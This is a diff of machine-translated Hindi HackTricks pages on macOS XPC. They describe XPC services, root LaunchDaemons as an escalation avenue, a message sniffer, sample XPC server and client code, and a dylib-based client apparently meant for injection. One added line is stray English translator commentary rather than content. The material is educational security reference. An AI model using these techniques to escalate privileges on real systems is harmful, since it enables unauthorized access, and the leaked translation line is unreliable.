+
+<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
+
+HackTricks का समर्थन करने के अन्य तरीके:
+
+* यदि आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं या **HackTricks को PDF में डाउनलोड** करना चाहते हैं तो [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) देखें!
+* [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
+* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा संग्रह विशेष [**NFTs**](https://opensea.io/collection/the-peass-family)
+* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) या **Twitter** पर मुझे 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)** का पालन करें।**
+* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।
+
+</details>
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/README.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/README.md
@ -2,35 +2,45 @@

 <details>

-<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+<summary><strong>शून्य से नायक तक AWS हैकिंग सीखें</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

-* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करना चाहते हैं? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
-* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
-* प्राप्त करें [**आधिकारिक PEASS और HackTricks swag**](https://peass.creator-spring.com)
-* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
-* **अपने हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को।**
+HackTricks का समर्थन करने के अन्य तरीके:
+
+* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
+* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com)
+* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
+* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) को **फॉलो करें**.
+* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें.

 </details>

-## मूलभूत जानकारी
+## मूल जानकारी

-XPC, जो macOS द्वारा उपयोग किया जाने वाले कर्नल XNU के बीच इंटर-प्रोसेस संचार के लिए खड़ा किया गया है, **macOS और iOS पर प्रक्रियाओं के बीच संचार के लिए एक ढांचा है**। XPC सिस्टम पर विभिन्न प्रक्रियाओं के बीच **सुरक्षित, असिंक्रोनस विधि कॉल बनाने के लिए एक तंत्र प्रदान करता है**। यह Apple के सुरक्षा परिदृश्य का हिस्सा है, जो **विशेषाधिकार-अलग किए गए अनुप्रयोगों** के निर्माण की अनुमति देता है जहां प्रत्येक **घटक** अपने काम करने के लिए **केवल उन अनुमतियों के साथ चलता है** जो उसे चाहिए, इससे एक संकटित प्रक्रिया से होने वाले संभावित क्षति की सीमा कम होती है।
+XPC, जिसका पूरा नाम XNU (macOS द्वारा प्रयुक्त कर्नेल) inter-Process Communication है, macOS और iOS पर **प्रक्रियाओं के बीच संचार** के लिए एक फ्रेमवर्क है। XPC एक तंत्र प्रदान करता है जो **सुरक्षित, असिंक्रोनस मेथड कॉल्स को विभिन्न प्रक्रियाओं के बीच** बनाने के लिए है। यह Apple की सुरक्षा पैराडाइम का एक हिस्सा है, जो **विशेषाधिकार-विभाजित अनुप्रयोगों के निर्माण** की अनुमति देता है जहां प्रत्येक **घटक** केवल उन्हीं अनुमतियों के साथ चलता है जो उसे अपना काम करने के लिए आवश्यक हैं, इस प्रकार समझौता की गई प्रक्रिया से संभावित क्षति को सीमित करता है।

-XPC एक इंटर-प्रोसेस संचार (IPC) के रूप में एक प्रकार का उपयोग करता है, जो समान सिस्टम पर चल रहे विभिन्न कार्यक्रमों को डेटा भेजने और प्राप्त करने के लिए विभिन्न विधियों का सेट है।
+XPC एक प्रकार का Inter-Process Communication (IPC) का उपयोग करता है, जो एक ही सिस्टम पर चल रहे विभिन्न प्रोग्रामों के बीच डेटा भेजने और प्राप्त करने के लिए तरीकों का एक सेट है।

-XPC के प्रमुख लाभ हैं:
+XPC के प्राथमिक लाभ हैं:

-1. **सुरक्षा**: कार्य को विभाजित करके, प्रत्येक प्रक्रिया को केवल उन अनुमतियों की प्रदान की जा सकती है जो उसे चाहिए। इसका मतलब है कि यदि कोई प्रक्रिया प्रभावित हो जाती है, तो उसे क्षति पहुंचाने की सीमित क्षमता होती है।
-2. **स्थिरता**: XPC सहायता से क्रैश को उस कंपोनेंट तक सीमित किया जा सकता है जहां वे होते हैं। यदि कोई प्रक्रिया क्रैश हो जाती है, तो उसे पुनः प्रारंभ किया जा सकता है बिना प्रभावित किए हुए सिस्टम के बाकी हिस्से पर।
-3. **प्रदर्शन**: XPC आसानी से संयोज्यता की अनुमति देता है, क्योंकि विभिन्न कार्यों को विभिन्न प्रक्रियाओं में समयानुसार चलाया जा सकता है।
+1. **सुरक्षा**: अलग-अलग प्रक्रियाओं में काम को विभाजित करके, प्रत्येक प्रक्रिया को केवल वही अनुमतियां दी जा सकती हैं जो उसे चाहिए। इसका मतलब है कि यदि कोई प्रक्रिया समझौता की जाती है, तो उसकी हानि करने की क्षमता सीमित होती है।
+2. **स्थिरता**: XPC दुर्घटनाओं को उस घटक तक सीमित करने में मदद करता है जहां वे होते हैं। यदि कोई प्रक्रिया क्रैश होती है, तो इसे बिना सिस्टम के बाकी हिस्सों को प्रभावित किए बिना पुनः आरंभ किया जा सकता है।
+3. **प्रदर्शन**: XPC आसान समानांतरता की अनुमति देता है, क्योंकि विभिन्न कार्य विभिन्न प्रक्रियाओं में एक साथ चलाए जा सकते हैं।

-एकमात्र **हानि** यह है कि **एक अनुप्रयोग को कई प्रक्रियाओं में विभाजित करना** जिसे XPC के माध्यम से संचार कराया जाता है, **कम दक्ष** होता है। लेकिन आज के सिस्टम में यह लगभग दिखाई नहीं देता है और लाभ अधिक होते हैं।
+एकमात्र **दोष** यह है कि **एक अनुप्रयोग को कई प्रक्रियाओं में विभाजित करना** और उन्हें XPC के माध्यम से संवाद करना **कम कुशल** है। लेकिन आज की प्रणालियों में यह लगभग ध्यान देने योग्य नहीं है और लाभ बेहतर हैं।

-## अनुप्रयोग विशेष XPC सेवाएं
+## अनुप्रयोग विशिष्ट XPC सेवाएँ

-एक अनुप्रयोग के XPC घटक **अनुप्रयोग के भीतर होते हैं**। उदाहरण के लिए, Safari में आप उन्हें **`/Applications/Safari.app/Contents/XPCServices`** में ढूंढ सकते हैं। उनमें **`.xpc`** एक्सटेंशन होता है (जैसे **`com.apple.Safari.SandboxBroker.xpc`**) और इसके साथ मुख्य बाइनरी के साथ भी **बंडल** होता है: `/Applications/Safari.app/Contents/XPCServices/com.apple.Safari.SandboxBroker.xpc/Contents/MacOS/com.apple.Safari.SandboxBroker` और एक `Info.plist: /Applications/Safari.app/Contents/XPCServices/com.apple.Safari.SandboxBroker.xpc/Contents/Info.plist`
+एक अनुप्रयोग के XPC घटक **अनुप्रयोग स्वयं के अंदर होते हैं।** उदाहरण के लिए, Safari में आप उन्हें **`/Applications/Safari.app/Contents/XPCServices`** में पा सकते हैं। उनका एक्सटेंशन **`.xpc`** होता है (जैसे **`com.apple.Safari.SandboxBroker.xpc`**) और वे **बंडल भी होते हैं** मुख्य बाइनरी के साथ इसके अंदर: `/Applications/Safari.app/Contents/XPCServices/com.apple.Safari.SandboxBroker.xpc/Contents/MacOS/com.apple.Safari.SandboxBroker` और एक `Info.plist: /Applications/Safari.app/Contents/XPCServices/com.apple.Safari.SandboxBroker.xpc/Contents/Info.plist`

-जैसा कि आप सोच रहे होंगे, **एक XPC घटक के पास अन्य XPC घटकों या मुख्य अनुप्रयोग बाइनरी की तुलना में विभिन्न अधिकाराधिकार और विशेषाधिकार** होंगे। केवल तभी नहीं, यदि एक XPC
+जैसा कि आप सोच रहे होंगे एक **XPC घटक के अलग अधिकार और विशेषाधिकार** होंगे अन्य XPC घटकों या मुख्य अनुप्रयोग बाइनरी से। इसके अलावा अगर XPC सेवा [**JoinExistingSession**](https://developer.apple.com/documentation/bundleresources/information\_property\_list/xpcservice/joinexistingsession) को इसकी **Info.plist** फाइल में "True" के रूप में सेट किया गया है। इस मामले में, XPC सेवा **उसी सुरक्षा सत्र में चलेगी जैसे अनुप्रयोग** जिसने इसे कॉल किया।
+
+XPC सेवाएँ **शुरू की जाती हैं** **launchd** द्वारा जब आवश्यक होती हैं और **बंद कर दी जाती हैं** एक बार सभी कार्य **पूरे** हो जाने के बाद सिस्टम संसाधनों को मुक्त करने के लिए। **अनुप्रयोग-विशिष्ट XPC घटक केवल अनुप्रयोग द्वारा ही उपयोग किए जा सकते हैं**, इस प्रकार संभावित कमजोरियों से जुड़े जोखिम को कम करते हैं।
+
+## सिस्टम वाइड XPC सेवाएँ
+
+सिस्टम-वाइड XPC सेवाएँ सभी उपयोगकर्ताओं के लिए सुलभ होती हैं। ये सेवाएँ, चाहे launchd हों या Mach-प्रकार की, उन्हें **plist** फाइलों में **परिभाषित किया जाना चाहिए** जो निर्दिष्ट निर्देशिकाओं जैसे **`/System/Library/LaunchDaemons`**, **`/Library/LaunchDaemons`**, **`/System/Library/LaunchAgents`**, या **`/Library/LaunchAgents`** में स्थित होती हैं।
+
+इन plist फाइलों में एक कुंजी **`MachServices`** होगी जिसमें सेवा का नाम होगा, और एक कुंजी **`Program`** जिसमें बाइनरी का पथ होगा:
 ```xml
 cat /Library/LaunchDaemons/com.jamf.management.daemon.plist

@ -64,23 +74,23 @@ cat /Library/LaunchDaemons/com.jamf.management.daemon.plist
 </dict>
 </plist>
 ```
-जो **`LaunchDameons`** में हैं, वे root द्वारा चलाए जाते हैं। इसलिए, अनधिकृत प्रक्रिया यदि इनमें से किसी के साथ बात कर सकती है, तो यह विशेषाधिकारों को बढ़ा सकती है।
+**`LaunchDameons`** में जो होते हैं वे root द्वारा चलाए जाते हैं। इसलिए यदि कोई अनाधिकृत प्रक्रिया इनमें से किसी से बात कर सकती है, तो वह संभवतः अधिकार बढ़ा सकती है।

-## XPC घटना संदेश
+## XPC इवेंट संदेश

-अनुप्रयोग विभिन्न घटना संदेशों की **सदस्यता** कर सकते हैं, जिससे उन्हें ऐसी घटनाओं के होने पर **आवश्यकता अनुसार प्रारंभ किया जा सकता है**। इन सेवाओं के लिए **सेटअप** **`LaunchEvent`** कुंजी सहित **launchd plist फ़ाइलों** में किया जाता है, जो **पिछली वाली वाली डायरेक्टरी में स्थित** होती हैं।
+एप्लिकेशन विभिन्न इवेंट **संदेशों** की **सदस्यता** ले सकते हैं, जिससे वे ऐसी घटनाओं के होने पर **मांग पर प्रारंभ** किए जा सकते हैं। इन सेवाओं की **सेटअप** **launchd plist फाइलों** में की जाती है, जो **पिछले वालों के समान निर्देशिकाओं** में स्थित होती हैं और इनमें एक अतिरिक्त **`LaunchEvent`** कुंजी होती है।

 ### XPC कनेक्टिंग प्रक्रिया जांच

-जब कोई प्रक्रिया XPC कनेक्शन के माध्यम से एक विधि को कॉल करने की कोशिश करती है, तो **XPC सेवा को यह जांचनी चाहिए कि क्या उस प्रक्रिया को कनेक्ट करने की अनुमति है**। यहां इसे जांचने और सामान्य गड़बड़ियों को देखने के लिए आम तरीके हैं:
+जब कोई प्रक्रिया XPC कनेक्शन के माध्यम से किसी मेथड को कॉल करने का प्रयास करती है, तो **XPC सेवा को जांचना चाहिए कि उस प्रक्रिया को कनेक्ट करने की अनुमति है या नहीं**। यहाँ उसे जांचने के सामान्य तरीके और सामान्य गलतियाँ हैं:

 {% content-ref url="macos-xpc-connecting-process-check/" %}
 [macos-xpc-connecting-process-check](macos-xpc-connecting-process-check/)
 {% endcontent-ref %}

-## XPC अधिकृतता
+## XPC अधिकारीकरण

-Apple अनुप्रयोगों को भी कुछ अधिकारों को **कॉन्फ़िगर करने और उन्हें प्राप्त करने के तरीके** की अनुमति देता है, ताकि यदि कॉल करने वाली प्रक्रिया में वे हों, तो वह XPC सेवा से एक विधि को **कॉल करने की अनुमति** हो:
+Apple एप्लिकेशन को कुछ अधिकारों को **कॉन्फ़िगर करने और उन्हें प्राप्त करने का तरीका** भी अनुमति देता है, इसलिए यदि कॉल करने वाली प्रक्रिया के पास वे होते हैं तो उसे **XPC सेवा से मेथड कॉल करने की अनुमति होगी**:

 {% content-ref url="macos-xpc-authorization.md" %}
 [macos-xpc-authorization.md](macos-xpc-authorization.md)
@ -88,7 +98,7 @@ Apple अनुप्रयोगों को भी कुछ अधिका

 ## XPC स्निफर

-XPC संदेशों को स्निफ करने के लिए आप [**xpcspy**](https://github.com/hot3eed/xpcspy) का उपयोग कर सकते हैं, जो **Frida** का उपयोग करता है।
+XPC संदेशों को स्निफ करने के लिए आप [**xpcspy**](https://github.com/hot3eed/xpcspy) का उपयोग कर सकते हैं जो **Frida** का उपयोग करता है।
 ```bash
 # Install
 pip3 install xpcspy
@ -156,6 +166,8 @@ dispatch_main();
 return 0;
 }
 ```
+{% endtab %}
+
 {% tab title="xpc_client.c" %}
 ```c
 // gcc xpc_client.c -o xpc_client
@ -185,36 +197,9 @@ dispatch_main();
 return 0;
 }
 ```
-{% tab title="xyz.hacktricks.service.plist" %}xyz.hacktricks.service.plist एक प्लिस्ट फ़ाइल है जो macOS पर एक XPC सेवा को कॉन्फ़िगर करती है। XPC (Inter-Process Communication) एक सुरक्षित और अनुक्रमिक तरीके से प्रक्रियाओं के बीच संचार करने की अनुमति देता है। यह फ़ाइल एक नामित पाइपलाइन और एक एक्सटर्नल बाउंडल संदर्भ के साथ एक XPC सेवा को निर्दिष्ट करती है। इस फ़ाइल में विभिन्न पैरामीटर जैसे कि एक्सटर्नल बाउंडल का पथ, एक्सटर्नल बाउंडल का नाम, एक्सटर्नल बाउंडल का बंडल आईडी, एक्सटर्नल बाउंडल का बंडल वर्ज़न, एक्सटर्नल बाउंडल का संस्करण आदि निर्दिष्ट किए जा सकते हैं। इस फ़ाइल को उपयोग करके आप XPC सेवा को कॉन्फ़िगर कर सकते हैं और उसे अनुक्रमिक तरीके से प्रक्रियाओं के साथ संचार करने की अनुमति दे सकते हैं।
+{% endtab %}

-यहां एक उदाहरण दिया गया है:
-
-```xml
-<?xml version="1.0" encoding="UTF-8"?>
-<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-<plist version="1.0">
-<dict>
-    <key>Label</key>
-    <string>xyz.hacktricks.service</string>
-    <key>ProgramArguments</key>
-    <array>
-        <string>/path/to/external/bundle</string>
-        <string>--argument1</string>
-        <string>value1</string>
-        <string>--argument2</string>
-        <string>value2</string>
-    </array>
-    <key>RunAtLoad</key>
-    <true/>
-    <key>KeepAlive</key>
-    <true/>
-</dict>
-</plist>
-```
-
-इस उदाहरण में, `xyz.hacktricks.service` नामक XPC सेवा को `/path/to/external/bundle` बाउंडल के साथ कॉन्फ़िगर किया गया है। इसमें `--argument1` और `--argument2` नामक दो पैरामीटर भी हैं जिनके मान `value1` और `value2` हैं। इस XPC सेवा को `RunAtLoad` और `KeepAlive` पैरामीटर से स्वचालित रूप से चालू रखा जाएगा।
-
-आप इस फ़ाइल को उपयोग करके अपनी एप्लिकेशन को सुरक्षित बना सकते हैं और उसे अनुक्रमिक तरीके से प्रक्रियाओं के साथ संचार करने की अनुमति दे सकते हैं।
+{% tab title="xyz.hacktricks.service.plist" %}
 ```xml
 <?xml version="1.0" encoding="UTF-8"?>
 <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0">
@ -235,8 +220,7 @@ return 0;
 </dict>
 </plist>
 ```
-{% endtab %}
-{% endtabs %}
+The provided text appears to be part of a markdown file used for documentation or instructional content, specifically it seems to be closing syntax for tabbed content. Since there is no actual content to translate, only markdown syntax is present, which should not be translated. Therefore, there is nothing to translate in the provided text. If you have any actual English content that needs translation into Hindi, please provide the text.
 ```bash
 # Compile the server & client
 gcc xpc_server.c -o xpc_server
@ -309,6 +293,8 @@ listener.delegate = delegate;
 sleep(10); // Fake something is done and then it ends
 }
 ```
+{% endtab %}
+
 {% tab title="oc_xpc_client.m" %}
 ```objectivec
 // gcc -framework Foundation oc_xpc_client.m -o oc_xpc_client
@ -332,54 +318,9 @@ NSLog(@"Received response: %@", response);
 return 0;
 }
 ```
-{% tab title="xyz.hacktricks.svcoc.plist" %}xyz.hacktricks.svcoc.plist एक प्रोपर्टी लिस्ट (plist) फ़ाइल है जो macOS में XPC सेवा के रूप में रजिस्टर होती है। यह फ़ाइल सेवा के लिए विभिन्न पैरामीटर और विन्यास सेट करने की अनुमति देती है। इस plist फ़ाइल को /Library/LaunchDaemons या /Library/LaunchAgents में स्थापित किया जा सकता है ताकि यह सिस्टम शुरू होने पर स्वचालित रूप से लोड हो सके।
+{% endtab %}

-यदि आपको इस plist फ़ाइल को बनाने की जानकारी नहीं है, तो आप इसे निम्नलिखित कमांड का उपयोग करके बना सकते हैं:
-
-```plaintext
-sudo nano /Library/LaunchDaemons/xyz.hacktricks.svcoc.plist
-```
-
-फ़ाइल को खोलने के बाद, आपको निम्नलिखित XML कोड को फ़ाइल में पेस्ट करना होगा:
-
-```xml
-<?xml version="1.0" encoding="UTF-8"?>
-<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-<plist version="1.0">
-<dict>
-    <key>Label</key>
-    <string>xyz.hacktricks.svcoc</string>
-    <key>ProgramArguments</key>
-    <array>
-        <string>/path/to/your/program</string>
-    </array>
-    <key>RunAtLoad</key>
-    <true/>
-</dict>
-</plist>
-```
-
-ध्यान दें कि आपको `<string>/path/to/your/program</string>` को अपनी वास्तविक प्रोग्राम के पथ के साथ बदलना होगा।
-
-फ़ाइल को सहेजने के लिए `Ctrl + X` दबाएं, फिर `Y` दबाएं और अंत में `Enter` दबाएं।
-
-अब, आपको निम्नलिखित कमांड का उपयोग करके इस plist फ़ाइल को लोड करना होगा:
-
-```plaintext
-sudo launchctl load /Library/LaunchDaemons/xyz.hacktricks.svcoc.plist
-```
-
-इसके बाद, आपका XPC सेवा सिस्टम शुरू होने पर स्वचालित रूप से चलेगा।
-
-यदि आपको इस XPC सेवा को बंद करने की जरूरत होती है, तो आप निम्नलिखित कमांड का उपयोग करके इसे अनलोड कर सकते हैं:
-
-```plaintext
-sudo launchctl unload /Library/LaunchDaemons/xyz.hacktricks.svcoc.plist
-```
-
-ध्यान दें कि आपको `/Library/LaunchDaemons/xyz.hacktricks.svcoc.plist` को अपनी वास्तविक plist फ़ाइल के साथ बदलना होगा।
-
-इस तरह, आप XPC सेवा को अपने macOS सिस्टम में रजिस्टर कर सकते हैं और उसे स्वचालित रूप से लोड और अनलोड कर सकते हैं।
+{% tab title="xyz.hacktricks.svcoc.plist" %}
 ```xml
 <?xml version="1.0" encoding="UTF-8"?>
 <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0">
@ -421,11 +362,7 @@ sudo launchctl load /Library/LaunchDaemons/xyz.hacktricks.svcoc.plist
 sudo launchctl unload /Library/LaunchDaemons/xyz.hacktricks.svcoc.plist
 sudo rm /Library/LaunchDaemons/xyz.hacktricks.svcoc.plist /tmp/oc_xpc_server
 ```
-## डायलब कोड के भीतर क्लाइंट
-
-The client code inside a Dylb is responsible for establishing a connection with the server and sending requests for specific tasks. It acts as a bridge between the user and the server, facilitating communication and data exchange.
-
-डायलब के भीतर क्लाइंट कोड का कार्य होता है सर्वर के साथ एक संबंध स्थापित करना और विशेष कार्यों के लिए अनुरोध भेजना। यह उपयोगकर्ता और सर्वर के बीच एक सेतु की तरह कार्य करता है, संचार और डेटा विनिमय को सुविधाजनक बनाता है।
+## क्लाइंट एक Dylb कोड के अंदर
 ```objectivec
 // gcc -dynamiclib -framework Foundation oc_xpc_client.m -o oc_xpc_client.dylib
 // gcc injection example:
@ -461,12 +398,14 @@ return;
 ```
 <details>

-<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>

-* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड** करने का उपयोग करना है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
-* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
-* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **या** मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
-* **अपने हैकिंग ट्रिक्स साझा करें और PRs सबमिट करें** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
+HackTricks का समर्थन करने के अन्य तरीके:
+
+* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
+* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
+* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
+* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें।

 </details>
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.md
@ -2,25 +2,27 @@

 <details>

-<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+<summary><strong>htARTE (HackTricks AWS Red Team Expert) के साथ शून्य से नायक तक AWS हैकिंग सीखें</strong></a><strong>!</strong></summary>

-* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँचना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सदस्यता योजनाओं**](https://github.com/sponsors/carlospolop) की जाँच करें!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
+HackTricks का समर्थन करने के अन्य तरीके:
+
+* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
 * [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
-* **[**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram समूह**](https://t.me/peass) में या मुझे **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
-* **अपनी हैकिंग तरकीबें साझा करें, [**hacktricks repo**](https://github.com/carlospolop/hacktricks) और [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके.**
+* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
+* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपोज़ में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।

 </details>

 ## XPC प्राधिकरण

-Apple एक और तरीका प्रस्तावित करता है जिससे पता चलता है कि कनेक्टिंग प्रोसेस के पास **एक्सपोज़्ड XPC मेथड को कॉल करने की अनुमतियाँ हैं या नहीं**.
+Apple एक और तरीका भी प्रस्तावित करता है जिससे पता चलता है कि क्या कनेक्टिंग प्रोसेस के पास **एक्सपोज़्ड XPC मेथड को कॉल करने की अनुमति है**।

-जब किसी एप्लिकेशन को **विशेषाधिकार प्राप्त उपयोगकर्ता के रूप में कार्य करने की आवश्यकता होती है**, तो एप्लिकेशन को विशेषाधिकार प्राप्त उपयोगकर्ता के रूप में चलाने के बजाय यह आमतौर पर एक HelperTool को रूट के रूप में इंस्टॉल करता है जो एक XPC सेवा के रूप में कॉल की जा सकती है उन कार्यों को पूरा करने के लिए। हालांकि, सेवा को कॉल करने वाले एप्लिकेशन के पास पर्याप्त प्राधिकरण होना चाहिए।
+जब किसी एप्लिकेशन को **विशेषाधिकार प्राप्त उपयोगकर्ता के रूप में कार्य करने की आवश्यकता होती है**, तो एप्लिकेशन को विशेषाधिकार प्राप्त उपयोगकर्ता के रूप में चलाने के बजाय आमतौर पर एक XPC सेवा के रूप में एक HelperTool को रूट के रूप में इंस्टॉल किया जाता है जिसे उन कार्यों को करने के लिए एप्लिकेशन से कॉल किया जा सकता है। हालांकि, सेवा को कॉल करने वाले एप्लिकेशन के पास पर्याप्त प्राधिकरण होना चाहिए।

